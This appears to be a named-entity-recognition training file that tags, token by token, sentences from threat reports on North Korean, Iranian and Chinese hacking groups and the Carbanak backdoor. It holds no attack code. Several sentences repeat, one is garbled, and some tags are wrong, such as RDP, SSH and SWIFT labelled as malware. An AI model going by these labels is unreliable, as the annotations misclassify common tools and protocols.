+the O
+North B-LOC
+Korean E-LOC
+regime O
+. O
+
+Since O
+2015 S-TIME
+, O
+APT38 S-APT
+has O
+attempted O
+to O
+steal O
+hundreds O
+of O
+millions O
+of O
+dollars O
+from O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+APT38 S-APT
+has O
+pursued O
+their O
+main O
+objective O
+of O
+targeting O
+banks S-IDTY
+and O
+financial B-IDTY
+entities E-IDTY
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+We O
+surmise O
+that O
+the O
+targeting O
+of O
+banks S-IDTY
+, O
+media S-IDTY
+, O
+and O
+government B-IDTY
+agencies E-IDTY
+is O
+conducted O
+in O
+support O
+of O
+APT38 S-APT
+'s O
+primary O
+mission O
+. O
+
+The O
+APT38 S-APT
+targeted O
+news B-IDTY
+outlets E-IDTY
+known O
+for O
+their O
+business O
+and O
+financial B-IDTY
+sector E-IDTY
+reporting O
+, O
+probably O
+in O
+support O
+of O
+efforts O
+to O
+identify O
+and O
+compromise O
+additional O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+APT38 S-APT
+also O
+targeted O
+financial B-IDTY
+transaction I-IDTY
+exchange I-IDTY
+companies E-IDTY
+likely O
+because O
+of O
+their O
+proximity O
+to O
+banks S-IDTY
+. O
+
+Given O
+the O
+lapse O
+in O
+time O
+between O
+the O
+spear-phishing S-ACT
+and O
+the O
+heist B-ACT
+activity E-ACT
+in O
+the O
+above O
+example O
+, O
+we O
+suggest O
+two O
+separate O
+but O
+related O
+groups S-APT
+under O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+were O
+responsible O
+for O
+carrying O
+out O
+missions O
+; O
+one O
+associated O
+with O
+reconnaissance O
+( O
+TEMP.Hermit S-APT
+or O
+a O
+related O
+group O
+) O
+and O
+another O
+for O
+the O
+heists O
+( O
+APT38 S-APT
+) O
+. O
+
+APT38 S-APT
+, O
+in O
+particular O
+, O
+is O
+strongly O
+distinguishable O
+because O
+of O
+its O
+specific O
+focus O
+on O
+financial B-IDTY
+institutions E-IDTY
+and O
+operations O
+that O
+attempt O
+to O
+use O
+SWIFT S-MAL
+fraud O
+to O
+steal O
+millions O
+of O
+dollars O
+at O
+a O
+time O
+. O
+
+We O
+can O
+confirm O
+that O
+the O
+APT38 B-ACT
+operator I-ACT
+activity E-ACT
+is O
+linked O
+to O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+, O
+but O
+maintains O
+a O
+set O
+of O
+common O
+characteristics O
+, O
+including O
+motivation O
+, O
+malware O
+, O
+targeting O
+, O
+and O
+TTPs O
+that O
+set O
+it O
+apart O
+from O
+other O
+statesponsored O
+operations O
+. O
+
+As O
+previously O
+mentioned O
+, O
+we O
+assess O
+with O
+high O
+confidence O
+that O
+APT38 S-APT
+'s O
+mission O
+is O
+focused O
+on O
+targeting O
+financial B-IDTY
+institutions E-IDTY
+to O
+raise O
+money O
+for O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+. O
+
+As O
+previously O
+mentioned O
+, O
+we O
+assess O
+with O
+high O
+confidence O
+that O
+APT38 S-APT
+'s O
+mission O
+is O
+focused O
+on O
+targeting O
+financial B-IDTY
+institutions E-IDTY
+and O
+financial O
+systems O
+to O
+raise O
+money O
+for O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+. O
+
+Although O
+the O
+APT38 S-APT
+'s O
+primary O
+targets O
+appear O
+to O
+be O
+Financial B-IDTY
+Exchange I-IDTY
+banks E-IDTY
+and O
+other O
+financial B-IDTY
+organizations E-IDTY
+, O
+they O
+have O
+also O
+Financial O
+Exchange O
+targeted O
+countries O
+' O
+media B-IDTY
+organizations E-IDTY
+with O
+a O
+focus O
+on O
+the O
+financial B-IDTY
+sector E-IDTY
+. O
+
+Since O
+at O
+least O
+the O
+beginning B-TIME
+of I-TIME
+2014 E-TIME
+, O
+APT38 S-APT
+operations O
+have O
+focused O
+almost O
+exclusively O
+on O
+developing O
+and O
+conducting O
+financially O
+motivated O
+campaigns S-ACT
+targeting O
+international B-IDTY
+entities E-IDTY
+, O
+whereas O
+TEMP.Hermit S-APT
+is O
+generally O
+linked O
+to O
+operations O
+focused O
+on O
+South B-LOC
+Korea E-LOC
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+TEMP.Hermit S-APT
+is O
+generally O
+linked O
+to O
+operations O
+focused O
+on O
+South B-LOC
+Korea E-LOC
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+While O
+North B-LOC
+Korean E-LOC
+cyber O
+operations O
+against O
+specific O
+countries O
+may O
+have O
+been O
+driven O
+by O
+diplomatic O
+factors O
+and O
+perceived O
+insults O
+against O
+Pyongyang O
+, O
+the O
+application O
+of O
+increasingly O
+restrictive O
+and O
+numerous O
+financial S-IDTY
+sanctions O
+against O
+North B-LOC
+Korea E-LOC
+probably O
+contributed O
+to O
+the O
+formation O
+of O
+APT38 S-APT
+. O
+
+APT38 S-APT
+'s O
+operations O
+began O
+in O
+February B-TIME
+2014 E-TIME
+and O
+were O
+likely O
+influenced O
+by O
+financial O
+sanctions O
+enacted O
+in O
+March B-TIME
+2013 E-TIME
+that O
+blocked O
+bulk O
+cash O
+transfers O
+and O
+restricted O
+North B-LOC
+Korea E-LOC
+'s O
+access O
+to O
+international O
+banking O
+systems O
+. O
+
+APT37 S-APT
+( O
+Reaper S-APT
+) O
+, O
+another O
+North B-LOC
+Korean E-LOC
+state-sponsored O
+group O
+, O
+targeted O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+company E-IDTY
+, O
+but O
+there O
+was O
+no O
+evidence O
+of O
+financial O
+fraud O
+. O
+
+APT37 S-APT
+, O
+another O
+North B-LOC
+Korean E-LOC
+state-sponsored O
+group O
+, O
+targeted O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+company E-IDTY
+, O
+but O
+there O
+was O
+no O
+evidence O
+of O
+financial O
+fraud O
+. O
+
+Early O
+APT38 S-APT
+operations O
+suggest O
+that O
+the O
+group O
+began O
+targeting O
+financial B-IDTY
+institutions E-IDTY
+with O
+an O
+intent O
+to O
+manipulate O
+financial O
+transaction O
+systems O
+at O
+least O
+as O
+early O
+as O
+February B-TIME
+2014 E-TIME
+, O
+although O
+we O
+did O
+not O
+observe O
+fraudulent O
+transactions O
+until O
+2015 S-TIME
+. O
+
+We O
+do O
+not O
+have O
+evidence O
+that O
+the O
+earliest O
+targeted O
+financial B-IDTY
+institutions E-IDTY
+were O
+victimized O
+by O
+fraudulent O
+transactions O
+before O
+APT38 S-APT
+left O
+the O
+compromised O
+environments O
+, O
+possibly O
+indicating O
+that O
+APT38 S-APT
+was O
+conducting O
+reconnaissance-only B-ACT
+activity E-ACT
+at O
+that O
+time O
+. O
+
+In O
+early B-TIME
+2014 E-TIME
+, O
+the O
+APT38 S-APT
+deployed O
+NESTEGG S-MAL
+( O
+a O
+backdoor O
+) O
+and O
+KEYLIME S-MAL
+( O
+a O
+keylogger S-MAL
+) O
+malware O
+designed O
+to O
+impact O
+financial O
+institution-specific O
+systems O
+at O
+a O
+Southeast B-LOC
+Asian E-LOC
+bank S-IDTY
+. O
+
+In O
+early B-TIME
+2014 E-TIME
+, O
+the O
+APT38 S-APT
+deployed O
+NESTEGG S-MAL
+( O
+a O
+backdoor O
+) O
+and O
+KEYLIME S-MAL
+( O
+a O
+keylogger S-MAL
+) O
+malware O
+designed O
+to O
+impact O
+financial O
+institution-specific O
+systems O
+at O
+a O
+Southeast B-LOC
+Asian E-LOC
+bank S-IDTY
+. O
+
+From O
+November B-TIME
+2015 E-TIME
+through O
+the O
+end B-TIME
+of I-TIME
+2016 E-TIME
+, O
+APT38 S-APT
+was O
+involved O
+in O
+at O
+least O
+nine O
+separate O
+compromises O
+against O
+banks S-IDTY
+. O
+
+Per O
+the O
+complaint O
+, O
+the O
+email S-ACT
+account O
+watsonhenny@gmail.com S-EMAIL
+was O
+used O
+to O
+send O
+LinkedIn O
+invitations O
+to O
+employees S-IDTY
+of O
+a O
+bank O
+later O
+targeted O
+by O
+APT38 S-APT
+. O
+
+Further O
+, O
+the O
+recent O
+DOJ O
+complaint O
+provides O
+insight O
+into O
+initial O
+compromise O
+techniques O
+conducted O
+by O
+North B-LOC
+Korean E-LOC
+operators S-APT
+against O
+APT38 S-APT
+targets O
+, O
+which O
+may O
+have O
+been O
+leveraged O
+as O
+part O
+of O
+the O
+initial O
+compromise O
+into O
+the O
+targeted O
+organizations O
+. O
+
+This O
+is O
+corroborated O
+by O
+our O
+identification O
+of O
+TEMP.Hermit S-APT
+'s O
+use O
+of O
+MACKTRUCK S-MAL
+at O
+a O
+bank O
+, O
+preceding O
+the O
+APT38 S-APT
+operation O
+targeting O
+the O
+bank S-IDTY
+'s O
+SWIFT O
+systems O
+in O
+late B-TIME
+2015 E-TIME
+. O
+
+APT38 S-APT
+relies O
+on O
+DYEPACK S-MAL
+, O
+a O
+SWIFT O
+transaction-hijacking O
+framework O
+, O
+to O
+initiate O
+transactions O
+, O
+steal O
+money O
+, O
+and O
+hide O
+any O
+evidence O
+of O
+the O
+fraudulent O
+transactions O
+from O
+the O
+victimized O
+bank S-IDTY
+. O
+
+The O
+APT38 S-APT
+uses O
+DYEPACK S-MAL
+to O
+manipulate O
+the O
+SWIFT O
+transaction O
+records O
+and O
+hide O
+evidence O
+of O
+the O
+malicious O
+transactions O
+, O
+so O
+bank B-IDTY
+personnel E-IDTY
+are O
+none O
+the O
+wiser O
+when O
+they O
+review O
+recent O
+transactions O
+. O
+
+During O
+this O
+heist O
+, O
+APT38 S-APT
+waited O
+for O
+a O
+holiday O
+weekend O
+in O
+the O
+respective O
+countries O
+to O
+increase O
+the O
+likelihood O
+of O
+hiding O
+the O
+transactions O
+from O
+banking S-IDTY
+authorities O
+. O
+
+During O
+one O
+reported O
+incident O
+, O
+APT38 S-APT
+caused O
+an O
+outage O
+in O
+the O
+bank S-IDTY
+'s O
+essential O
+services O
+. O
+
+We O
+attribute O
+APT38 S-APT
+to O
+North B-LOC
+Korean E-LOC
+state-sponsored O
+operators S-APT
+based O
+on O
+a O
+combination O
+of O
+technical O
+indicators O
+linking O
+the O
+activity O
+to O
+Pyongyang O
+and O
+details O
+released O
+by O
+DOJ O
+implicating O
+North B-LOC
+Korean E-LOC
+national O
+Park O
+Jin O
+Hyok O
+in O
+a O
+criminal O
+conspiracy O
+. O
+
+As O
+detailed O
+in O
+the O
+DOJ O
+complaint O
+, O
+a O
+sample O
+of O
+WHITEOUT S-MAL
+malware S-MAL
+we O
+attribute O
+to O
+APT38 S-APT
+was O
+used O
+between O
+2015 S-TIME
+and O
+2016 S-TIME
+against O
+a O
+Southeast B-LOC
+Asian E-LOC
+bank S-IDTY
+. O
+
+APT38 S-APT
+'s O
+increasingly O
+aggressive O
+targeting O
+against O
+banks S-IDTY
+and O
+other O
+financial B-IDTY
+institutions E-IDTY
+has O
+paralleled O
+North B-LOC
+Korea E-LOC
+'s O
+worsening O
+financial O
+condition O
+. O
+
+APT38 S-APT
+'s O
+increasingly O
+aggressive O
+targeting O
+against O
+banks S-IDTY
+and O
+other O
+financial B-IDTY
+institutions E-IDTY
+has O
+paralleled O
+North B-LOC
+Korea E-LOC
+'s O
+worsening O
+financial O
+condition O
+. O
+
+APT38 S-APT
+'s O
+increasingly O
+aggressive O
+targeting O
+against O
+banks S-IDTY
+and O
+other O
+financial B-IDTY
+institutions E-IDTY
+has O
+paralleled O
+North B-LOC
+Korea E-LOC
+'s O
+worsening O
+financial O
+condition O
+. O
+
+Malware O
+overlaps O
+between O
+APT38 S-APT
+and O
+TEMP.Hermit S-APT
+highlight O
+the O
+shared O
+development O
+resources O
+accessible O
+by O
+multiple O
+operational B-APT
+groups E-APT
+linked O
+to O
+North B-LOC
+Korean E-LOC
+state-sponsored O
+activity O
+. O
+
+APT39 S-APT
+has O
+prioritized O
+the O
+telecommunications B-IDTY
+sector E-IDTY
+, O
+with O
+additional O
+targeting O
+of O
+the O
+travel B-IDTY
+industry E-IDTY
+and O
+IT B-IDTY
+firms E-IDTY
+that O
+support O
+it O
+and O
+the O
+high-tech B-IDTY
+industry E-IDTY
+. O
+
+This O
+is O
+evidence O
+of O
+shared O
+motivation O
+and O
+intent O
+to O
+target O
+the O
+SWIFT O
+system O
+by O
+the O
+North B-LOC
+Korean E-LOC
+operators S-APT
+performing O
+the O
+reconnaissance O
+and O
+APT38 S-APT
+which O
+later O
+targeted O
+that O
+organization O
+. O
+
+Although O
+APT38 S-APT
+is O
+distinct O
+from O
+other O
+TEMP.Hermit B-ACT
+activity E-ACT
+, O
+both O
+groups S-APT
+operate O
+consistently O
+within O
+the O
+interests O
+of O
+the O
+North B-LOC
+Korean E-LOC
+state O
+. O
+
+Based O
+on O
+details O
+published O
+in O
+the O
+DOJ O
+complaint O
+against O
+North B-LOC
+Korean E-LOC
+programmer O
+Park O
+Jin O
+Hyok O
+, O
+we O
+know O
+that O
+APT38 S-APT
+and O
+other O
+cyber B-APT
+operators E-APT
+linked O
+to O
+TEMP.Hermit S-APT
+are O
+associated O
+with O
+Lab B-IDTY
+110 E-IDTY
+, O
+an O
+organization O
+subordinate O
+to O
+or O
+synonymous O
+with O
+the O
+6th O
+Technical O
+Bureau O
+in O
+North B-LOC
+Korea E-LOC
+. O
+
+As O
+detailed O
+in O
+the O
+DOJ O
+complaint O
+, O
+a O
+sample O
+of O
+WHITEOUT S-MAL
+( O
+aka O
+Contopee S-MAL
+) O
+malware O
+we O
+attribute O
+to O
+APT38 S-APT
+was O
+used O
+between O
+2015 S-TIME
+and O
+2016 S-TIME
+against O
+a O
+Southeast B-LOC
+Asian E-LOC
+bank S-IDTY
+. O
+
+Based O
+on O
+details O
+published O
+in O
+the O
+DOJ O
+complaint O
+against O
+North B-LOC
+Korean E-LOC
+programmer O
+Park O
+Jin O
+Hyok O
+, O
+we O
+know O
+that O
+APT38 S-APT
+and O
+other O
+cyber B-APT
+operators E-APT
+linked O
+to O
+TEMP.Hermit S-APT
+are O
+associated O
+with O
+Lab B-IDTY
+110 E-IDTY
+, O
+an O
+organization O
+subordinate O
+to O
+or O
+synonymous O
+with O
+the O
+6th O
+Technical O
+Bureau O
+in O
+North B-LOC
+Korea E-LOC
+'s O
+Reconnaissance B-IDTY
+General I-IDTY
+Bureau E-IDTY
+( O
+RGB S-IDTY
+) O
+. O
+
+APT38 S-APT
+. O
+
+As O
+detailed O
+in O
+the O
+DOJ O
+complaint O
+, O
+a O
+sample O
+of O
+WHITEOUT S-MAL
+( O
+aka O
+Contopee S-MAL
+) O
+malware O
+we O
+attribute O
+to O
+APT38 S-APT
+was O
+used O
+between O
+2015 S-TIME
+and O
+2016 S-TIME
+against O
+a O
+Southeast B-LOC
+Asian E-LOC
+bank S-IDTY
+. O
+
+APT38 S-APT
+'s O
+targeting O
+of O
+financial B-IDTY
+institutions E-IDTY
+is O
+most O
+likely O
+an O
+effort O
+by O
+the O
+North B-LOC
+Korean E-LOC
+government O
+to O
+supplement O
+their O
+heavily-sanctioned O
+economy O
+. O
+
+We O
+have O
+moderate O
+confidence O
+APT39 S-APT
+operations O
+are O
+conducted O
+in O
+support O
+of O
+Iranian S-LOC
+national O
+interests O
+based O
+on O
+regional O
+targeting O
+patterns O
+focused O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+APT39 S-APT
+'s O
+focus O
+on O
+the O
+widespread O
+theft O
+of O
+personal O
+information O
+sets O
+it O
+apart O
+from O
+other O
+Iranian S-LOC
+groups S-APT
+FireEye S-SECTEAM
+tracks O
+, O
+which O
+have O
+been O
+linked O
+to O
+influence O
+operations O
+, O
+disruptive O
+attacks O
+, O
+and O
+other O
+threats O
+. O
+
+APT39 S-APT
+'s O
+focus O
+on O
+the O
+telecommunications B-IDTY
+and I-IDTY
+travel I-IDTY
+industries E-IDTY
+suggests O
+intent O
+to O
+perform O
+monitoring O
+, O
+tracking O
+, O
+or O
+surveillance O
+operations O
+against O
+specific B-IDTY
+individuals E-IDTY
+, O
+collect O
+proprietary O
+or O
+customer O
+data O
+for O
+commercial O
+or O
+operational O
+purposes O
+that O
+serve O
+strategic O
+requirements O
+related O
+to O
+national O
+priorities O
+, O
+or O
+create O
+additional O
+accesses O
+and O
+vectors O
+to O
+facilitate O
+future O
+campaigns S-ACT
+. O
+
+Other O
+groups S-APT
+attributed O
+to O
+Iranian S-LOC
+attackers S-APT
+, O
+such O
+as O
+Rocket B-APT
+Kitten E-APT
+, O
+have O
+targeted O
+Iranian S-LOC
+individuals O
+in O
+the O
+past O
+, O
+including O
+anonymous B-IDTY
+proxy I-IDTY
+users E-IDTY
+, O
+researchers S-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+dissidents S-IDTY
+. O
+
+Remexi S-MAL
+is O
+a O
+basic O
+back O
+door O
+Trojan S-MAL
+that O
+allows O
+Cadelle S-APT
+to O
+open O
+a O
+remote O
+shell O
+on O
+the O
+computer O
+and O
+execute O
+commands O
+. O
+
+Remexi S-MAL
+is O
+a O
+basic O
+back O
+door O
+Trojan S-MAL
+that O
+allows O
+attackers S-APT
+to O
+open O
+a O
+remote O
+shell O
+on O
+the O
+computer O
+and O
+execute O
+commands O
+. O
+
+One O
+group O
+, O
+which O
+we O
+call O
+Cadelle S-APT
+, O
+uses O
+Backdoor.Cadelspy S-MAL
+, O
+while O
+the O
+other O
+, O
+which O
+we've O
+named O
+Chafer S-APT
+, O
+uses O
+Backdoor.Remexi S-MAL
+and O
+Backdoor.Remexi.B S-MAL
+. O
+
+APT39 S-APT
+facilitates O
+lateral O
+movement O
+through O
+myriad O
+tools O
+such O
+as O
+Remote B-MAL
+Desktop I-MAL
+Protocol E-MAL
+( O
+RDP S-MAL
+) O
+, O
+Secure B-MAL
+Shell E-MAL
+( O
+SSH S-MAL
+) O
+, O
+PsExec S-MAL
+, O
+RemCom S-MAL
+, O
+and O
+xCmdSvc S-MAL
+. O
+
+The O
+APT39 S-APT
+were O
+using O
+an O
+improved O
+version O
+of O
+Remexi O
+in O
+what O
+the O
+victimology O
+suggests O
+might O
+be O
+a O
+domestic O
+cyber-espionage O
+operation O
+. O
+
+A O
+well-funded O
+, O
+highly O
+active O
+group O
+of O
+Middle B-LOC
+Eastern E-LOC
+hackers O
+was O
+caught O
+, O
+yet O
+again O
+, O
+using O
+a O
+lucrative O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+the O
+wild O
+to O
+break O
+into O
+computers O
+and O
+infect O
+them O
+with O
+powerful O
+spyware O
+developed O
+by O
+an O
+infamous O
+cyberweapons O
+dealer O
+named O
+Gamma B-APT
+Group E-APT
+. O
+
+A O
+well-funded O
+, O
+highly O
+active O
+BlackOasis B-APT
+group E-APT
+of O
+Middle B-LOC
+Eastern E-LOC
+hackers O
+was O
+caught O
+, O
+yet O
+again O
+, O
+using O
+a O
+lucrative O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+the O
+wild O
+to O
+break O
+into O
+computers O
+and O
+infect O
+them O
+with O
+powerful O
+spyware O
+developed O
+by O
+an O
+infamous O
+cyberweapons O
+dealer O
+named O
+Gamma B-APT
+Group E-APT
+. O
+
+The O
+Middle B-LOC
+Eastern E-LOC
+hacker O
+group O
+in O
+this O
+case O
+is O
+codenamed O
+" O
+BlackOasis S-APT
+" O
+. O
+
+Kaspersky S-SECTEAM
+found O
+the O
+BlackOasis B-APT
+group E-APT
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+Kaspersky S-SECTEAM
+found O
+the O
+group O
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+BlackOasis S-APT
+' O
+interests O
+span O
+a O
+wide O
+gamut O
+of O
+figures O
+involved O
+in O
+Middle B-LOC
+Eastern E-LOC
+politics S-IDTY
+. O
+
+REDBALDKNIGHT S-APT
+, O
+also O
+known O
+as O
+BRONZE B-APT
+BUTLER E-APT
+and O
+Tick S-APT
+, O
+is O
+a O
+cyberespionage S-ACT
+group O
+known O
+to O
+target O
+Japanese S-LOC
+organizations O
+such O
+as O
+government B-IDTY
+agencies E-IDTY
+( O
+including O
+defense S-IDTY
+) O
+as O
+well O
+as O
+those O
+in O
+biotechnology S-IDTY
+, O
+electronics B-IDTY
+manufacturing E-IDTY
+, O
+and O
+industrial B-IDTY
+chemistry E-IDTY
+. O
+
+REDBALDKNIGHT S-APT
+, O
+also O
+known O
+as O
+BRONZE B-APT
+BUTLER E-APT
+and O
+Tick S-APT
+, O
+is O
+a O
+cyberespionage S-ACT
+group O
+known O
+to O
+target O
+Japan S-LOC
+such O
+as O
+government B-IDTY
+agencies E-IDTY
+as O
+well O
+as O
+those O
+in O
+biotechnology S-IDTY
+, O
+electronics B-IDTY
+manufacturing E-IDTY
+, O
+and O
+industrial B-IDTY
+chemistry E-IDTY
+. O
+
+In O
+fact O
+, O
+REDBALDKNIGHT S-APT
+has O
+been O
+targeting O
+Japan S-LOC
+as O
+early O
+as O
+2008 S-TIME
+, O
+based O
+on O
+the O
+file O
+properties O
+of O
+the O
+decoy B-FILE
+documents E-FILE
+they've O
+been O
+sending O
+to O
+their O
+targets O
+. O
+
+In O
+fact O
+, O
+REDBALDKNIGHT S-APT
+has O
+been O
+zeroing O
+in O
+on O
+Japanese S-LOC
+organizations O
+as O
+early O
+as O
+2008 S-TIME
+— O
+at O
+least O
+based O
+on O
+the O
+file O
+properties O
+of O
+the O
+decoy B-FILE
+documents E-FILE
+they've O
+been O
+sending O
+to O
+their O
+targets O
+. O
+
+Secureworks® S-SECTEAM
+incident O
+responders O
+and O
+Counter O
+Threat O
+Unit™ O
+( O
+CTU S-SECTEAM
+) O
+researchers O
+investigated O
+activities S-ACT
+associated O
+with O
+the O
+BRONZE B-APT
+BUTLER E-APT
+( O
+also O
+known O
+as O
+Tick S-APT
+) O
+threat O
+group O
+, O
+which O
+likely O
+originates O
+in O
+the O
+People O
+. O
+
+Targeting O
+data O
+supports O
+the O
+belief O
+that O
+APT39 S-APT
+'s O
+key O
+mission O
+is O
+to O
+track O
+or O
+monitor O
+targets O
+of O
+interest O
+, O
+collect O
+personal O
+information O
+, O
+including O
+travel O
+itineraries O
+, O
+and O
+gather O
+customer O
+data O
+from O
+telecommunications B-IDTY
+firms E-IDTY
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+has O
+used O
+a O
+broad O
+range O
+of O
+publicly O
+available O
+( O
+Mimikatz S-MAL
+and O
+gsecdump S-MAL
+) O
+and O
+proprietary O
+( O
+Daserf S-MAL
+and O
+Datper S-MAL
+) O
+tools O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+are O
+also O
+fluent O
+in O
+Japanese S-LOC
+, O
+crafting O
+phishing B-ACT
+emails S-TOOL
+in O
+native O
+Japanese S-LOC
+and O
+operating O
+successfully O
+within O
+a O
+Japanese-language O
+environment O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+has O
+demonstrated O
+the O
+ability O
+to O
+identify O
+a O
+significant O
+zero-day S-VULNAME
+vulnerability O
+within O
+a O
+popular O
+Japanese S-LOC
+corporate O
+tool O
+and O
+then O
+use O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+indiscriminately O
+compromise O
+Japanese S-LOC
+Internet-facing O
+enterprise O
+systems O
+. O
+
+The O
+group O
+has O
+demonstrated O
+the O
+ability O
+to O
+identify O
+a O
+significant O
+zero-day S-VULNAME
+vulnerability O
+within O
+a O
+popular O
+Japanese S-LOC
+corporate O
+tool O
+and O
+then O
+use O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+indiscriminately O
+compromise O
+Japanese S-LOC
+Internet-facing O
+enterprise O
+systems O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+has O
+used O
+phishing B-ACT
+emails S-TOOL
+with O
+Flash S-TOOL
+animation O
+attachments O
+to O
+download O
+and O
+execute O
+Daserf S-MAL
+malware S-MAL
+, O
+and O
+has O
+also O
+leveraged O
+Flash S-TOOL
+exploits S-VULNAME
+for O
+SWC B-ACT
+attacks E-ACT
+. O
+
+The O
+group O
+has O
+used O
+phishing B-ACT
+emails S-TOOL
+with O
+Flash S-TOOL
+animation O
+attachments O
+to O
+download O
+and O
+execute O
+Daserf S-MAL
+malware S-MAL
+, O
+and O
+has O
+also O
+leveraged O
+Flash S-TOOL
+exploits S-VULNAME
+for O
+SWC B-ACT
+attacks E-ACT
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+uses O
+credential O
+theft O
+tools O
+such O
+as O
+Mimikatz S-MAL
+and O
+WCE S-MAL
+to O
+steal O
+authentication O
+information O
+from O
+the O
+memory O
+of O
+compromised O
+hosts O
+. O
+
+While O
+investigating O
+a O
+2016 S-TIME
+intrusion O
+, O
+Secureworks S-SECTEAM
+identified O
+BRONZE B-APT
+BUTLER E-APT
+exploiting O
+a O
+then-unpatched O
+remote B-ACT
+code I-ACT
+execution E-ACT
+vulnerability O
+( O
+CVE-2016-7836 S-VULID
+) O
+in O
+SKYSEA O
+Client O
+View O
+, O
+a O
+popular O
+Japanese S-LOC
+product O
+used O
+to O
+manage O
+an O
+organization O
+. O
+
+While O
+investigating O
+a O
+2016 S-TIME
+intrusion O
+, O
+Secureworks S-SECTEAM
+incident O
+responders O
+identified O
+BRONZE B-APT
+BUTLER E-APT
+exploiting O
+a O
+then-unpatched O
+remote B-ACT
+code I-ACT
+execution E-ACT
+vulnerability O
+( O
+CVE-2016-7836 S-VULID
+) O
+in O
+SKYSEA O
+Client O
+View O
+, O
+a O
+popular O
+Japanese S-LOC
+product O
+used O
+to O
+manage O
+an O
+organization O
+. O
+
+Several O
+xxmm O
+samples O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+incorporate O
+Mimikatz S-MAL
+, O
+allowing O
+BRONZE B-APT
+BUTLER E-APT
+to O
+issue O
+Mimikatz S-MAL
+commands O
+directly O
+from O
+xxmm O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+compromises O
+organizations O
+to O
+conduct O
+cyberespionage S-APT
+, O
+primarily O
+focusing O
+on O
+Japan S-LOC
+. O
+
+Symantec S-SECTEAM
+discovered O
+the O
+most O
+recent O
+wave O
+of O
+Tick B-ACT
+attacks E-ACT
+in O
+July B-TIME
+2015 E-TIME
+, O
+when O
+the O
+group O
+compromised O
+three O
+different O
+Japanese S-LOC
+websites O
+with O
+a O
+Flash B-ACT
+( I-ACT
+.swf I-ACT
+) I-ACT
+exploit E-ACT
+to O
+mount O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+Carbanak S-MAL
+is O
+a O
+remote O
+backdoor O
+( O
+initially O
+based O
+on O
+Carberp S-MAL
+) O
+, O
+designed O
+for O
+espionage S-ACT
+, O
+data O
+Exfiltration S-ACT
+and O
+to O
+provide O
+remote O
+access O
+to O
+infected O
+machines O
+. O
+
+Symantec S-SECTEAM
+discovered O
+the O
+most O
+recent O
+wave O
+of O
+Tick B-ACT
+attacks E-ACT
+in O
+July B-TIME
+2015 E-TIME
+, O
+when O
+BRONZE B-APT
+BUTLER E-APT
+compromised O
+three O
+different O
+Japanese S-LOC
+websites O
+with O
+a O
+Flash B-ACT
+( I-ACT
+.swf I-ACT
+) I-ACT
+exploit E-ACT
+to O
+mount O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+In O
+some O
+cases O
+, O
+the O
+attackers S-APT
+used O
+the O
+Society O
+for O
+Worldwide B-MAL
+Interbank I-MAL
+Financial I-MAL
+Telecommunication E-MAL
+( O
+SWIFT S-MAL
+) O
+network O
+to O
+transfer O
+money O
+to O
+their O
+accounts O
+. O
+
+Carbanak S-FILE
+is O
+a O
+backdoor S-MAL
+used O
+by O
+the O
+attackers S-APT
+to O
+compromise O
+the O
+victim O
+. O
+
+If O
+found O
+on O
+the O
+target O
+system O
+, O
+Carbanak S-MAL
+will O
+try O
+to O
+exploit S-VULNAME
+a O
+known O
+vulnerability O
+in O
+Windows S-OS
+XP O
+, O
+Windows S-OS
+Server O
+2003 O
+, O
+Windows S-OS
+Vista O
+, O
+Windows S-OS
+Server O
+2008 O
+, O
+Windows S-OS
+7 O
+, O
+Windows S-OS
+8 O
+, O
+and O
+Windows S-OS
+Server O
+2012 O
+, O
+CVE-2013-3660 S-VULID
+, O
+for O
+local O
+privilege O
+escalation O
+. O
+
+To O
+enable O
+connections O
+to O
+the O
+infected O
+computer O
+using O
+the O
+Remote B-MAL
+Desktop I-MAL
+Protocol E-MAL
+( O
+RDP S-MAL
+) O
+, O
+Carbanak S-MAL
+sets O
+Termservice O
+service O
+execution O
+mode O
+to O
+Auto O
+. O
+
+Carbanak S-MAL
+is O
+also O
+aware O
+of O
+the O
+IFOBS O
+banking O
+application O
+and O
+can O
+, O
+on O
+command O
+, O
+substitute O
+the O
+details O
+of O
+payment O
+documents O
+in O
+the O
+IFOBS O
+system O
+. O
+
+Sensitive O
+bank O
+documents O
+have O
+be O
+found O
+on O
+the O
+servers O
+that O
+were O
+controlling O
+Carbanak S-MAL
+. O
+
+Existing O
+telemetry O
+indicates O
+that O
+the O
+Carbanak S-MAL
+attackers S-APT
+are O
+trying O
+to O
+expand O
+operations O
